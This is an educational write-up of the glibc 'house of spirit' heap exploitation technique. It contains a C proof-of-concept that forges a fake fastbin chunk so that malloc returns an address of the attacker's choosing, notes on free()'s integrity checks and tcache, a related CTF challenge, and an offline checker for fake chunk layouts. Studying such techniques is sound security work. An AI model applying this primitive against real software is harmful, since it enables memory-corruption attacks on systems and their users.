house_of_spirit
#include <stdio.h>
#include <stdlib.h>

int main()
{
	printf("This file demonstrates the house of spirit attack.\n");
	printf("Calling malloc() once so that it sets up its memory.\n");
	malloc(1); // initialises the main arena, so av->system_mem is set and free() has an arena to work with

	printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
	unsigned long long *a;
	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

	printf("This region (memory of length: %lu) contains two chunks. The first chunk's header is at %p and the second's at %p.\n", sizeof(fake_chunks), &fake_chunks[0], &fake_chunks[8]);

	printf("The chunk.size of the first fake chunk has to be the requested size plus the 16-byte chunk header, while still falling into the fastbin category (<= 0x80 on x64). "
	       "The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. "
	       "E.g. on x64, requests of 0x30-0x38 are all rounded to a 0x40 chunk, so they would work for the malloc parameter at the end.\n");
	fake_chunks[1] = 0x40; // this is the size

	printf("The chunk.size of the *next* fake chunk has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (0x21000 = 132 KiB for the main arena after its first sbrk) "
	       "to pass the nextsize integrity checks. No need for fastbin size.\n");
	// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8 words to the next chunk, plus one word for its prev_size field
	fake_chunks[9] = 0x1234; // nextsize

	printf("Now we will overwrite our pointer with the address of the user region inside the fake first chunk, %p.\n", &fake_chunks[2]);
	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
	a = &fake_chunks[2];

	printf("Freeing the overwritten pointer.\n");
	free(a);

	printf("Now the next malloc will return the region of our fake chunk, %p!\n", &fake_chunks[2]);
	printf("malloc(0x30): %p\n", malloc(0x30));
	return 0;
}
Related challenge
pwnable.tw spirited_away
Why the fake chunk needs a second size field (the next chunk's size): free() checks the size of the chunk that follows, so a sane value there is required for free() to complete normally.
For a fastbin-sized chunk the PREV_INUSE flag does not matter.
The other flags (IS_MMAPPED and NON_MAIN_ARENA) must be clear: IS_MMAPPED sends the chunk to munmap_chunk(), and NON_MAIN_ARENA makes free() look up an arena through heap_for_ptr() on an address that is not a heap.
Caveat: on glibc 2.26 and later the freed fake chunk lands in the tcache first (chunk sizes up to 0x410), and the tcache path does not check the next chunk's size at all; the nextsize check only applies once the chunk reaches the fastbin path (the tcache bin for that size already holds 7 entries, or tcache is disabled). The pointer alignment and minimum size checks apply on both paths.
Conclusion: a technique for making malloc() return an address of your choosing. What you need is a pointer to that address that gets passed to free(), a fastbin-sized chunk.size written 8 bytes before it, and a sane size field where the next chunk would start.
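Before spending a write primitive on a fake chunk it is worth checking the candidate layout offline. The program below is an added example, not part of the original post or of how2heap: it replays the checks that stand between free(mem) and the fastbin insertion (IS_MMAPPED, NON_MAIN_ARENA, pointer alignment, size sanity, the fastbin limit, and the nextsize check) against a buffer laid out like fake_chunks above. The constants assume x86-64 glibc (SIZE_SZ 8, 16-byte alignment, default get_max_fast() of 128) and a main arena whose system_mem is 0x21000; the function and scenario names are my own, and the buffers are constructed test data.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed x86-64 glibc constants (not the real glibc headers). */
#define SIZE_SZ          8
#define MALLOC_ALIGN     16
#define MINSIZE          32
#define MAX_FAST_DEFAULT 128
#define PREV_INUSE       0x1ULL
#define IS_MMAPPED       0x2ULL
#define NON_MAIN_ARENA   0x4ULL
#define SIZE_BITS        (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

enum hos_verdict {
    HOS_OK = 0,
    HOS_MMAPPED,         /* __libc_free() hands the chunk to munmap_chunk() */
    HOS_NON_MAIN_ARENA,  /* arena_for_chunk() goes through heap_for_ptr() */
    HOS_MISALIGNED,      /* "free(): invalid pointer" */
    HOS_BAD_SIZE,        /* "free(): invalid size" */
    HOS_NOT_FASTBIN,     /* size > get_max_fast(): never reaches the fastbin path */
    HOS_BAD_NEXTSIZE     /* "free(): invalid next size (fast)" */
};

static uint64_t read_u64(const uint8_t *at)
{
    uint64_t v;
    memcpy(&v, at, sizeof v);
    return v;
}

/* Model of the checks free(mem) performs, in glibc's order, before a
 * fastbin-sized chunk is put on its fastbin. system_mem models av->system_mem. */
enum hos_verdict house_of_spirit_check(const void *mem, size_t system_mem)
{
    const uint8_t *p = (const uint8_t *)mem - 2 * SIZE_SZ;       /* mem2chunk() */
    uint64_t size_field = read_u64(p + SIZE_SZ);
    size_t size = (size_t)(size_field & ~SIZE_BITS);             /* chunksize() */

    if (size_field & IS_MMAPPED)               return HOS_MMAPPED;
    if (size_field & NON_MAIN_ARENA)           return HOS_NON_MAIN_ARENA;
    if ((uintptr_t)p % MALLOC_ALIGN)           return HOS_MISALIGNED;
    if (size < MINSIZE || size % MALLOC_ALIGN) return HOS_BAD_SIZE;
    if (size > MAX_FAST_DEFAULT)               return HOS_NOT_FASTBIN;

    /* nextsize check: the raw field is compared with 2*SIZE_SZ, the masked one with system_mem */
    uint64_t next_field = read_u64(p + size + SIZE_SZ);
    if (next_field <= 2 * SIZE_SZ || (next_field & ~SIZE_BITS) >= system_mem)
        return HOS_BAD_NEXTSIZE;
    return HOS_OK;
}

/* Constructed layout mirroring the program above: header in buf[0..1],
 * user region at &buf[2], next chunk's size field at buf[size/8 + 1]. */
static uint64_t *lay_out(uint64_t *buf, size_t nwords, uint64_t size_field, uint64_t next_field)
{
    memset(buf, 0, nwords * sizeof *buf);
    buf[1] = size_field;
    buf[(size_field & ~SIZE_BITS) / sizeof *buf + 1] = next_field;
    return &buf[2];
}

#define SYSTEM_MEM 0x21000  /* assumed: main arena after its first sbrk() */
#define NWORDS 32
static uint64_t scratch[NWORDS] __attribute__((aligned(16)));

/* One candidate fake chunk per scenario; each returns the verdict free() would reach. */
enum hos_verdict scenario_good(void)       { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x40, 0x1234), SYSTEM_MEM); }
enum hos_verdict scenario_prev_inuse(void) { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x41, 0x1234), SYSTEM_MEM); }
enum hos_verdict scenario_mmapped(void)    { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x42, 0x1234), SYSTEM_MEM); }
enum hos_verdict scenario_next_zero(void)  { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x40, 0x0), SYSTEM_MEM); }
enum hos_verdict scenario_next_huge(void)  { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x40, SYSTEM_MEM), SYSTEM_MEM); }
enum hos_verdict scenario_too_big(void)    { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x90, 0x1234), SYSTEM_MEM); }
/* +1 word: the pointer handed to free() is only 8-byte aligned */
enum hos_verdict scenario_misaligned(void) { return house_of_spirit_check(lay_out(scratch, NWORDS, 0x40, 0x1234) + 1, SYSTEM_MEM); }
```

The scenarios encode the rules from the notes: 0x41 passes because PREV_INUSE is masked off, 0x42 fails on IS_MMAPPED, a zero or system_mem-sized next field fails the nextsize check, a 0x90 chunk is not fastbin-sized on a default arena, and a pointer that is not 16-byte aligned is rejected before any size is considered. Remember that on a tcache-enabled glibc the nextsize verdict only matters once the chunk falls through to the fastbin path.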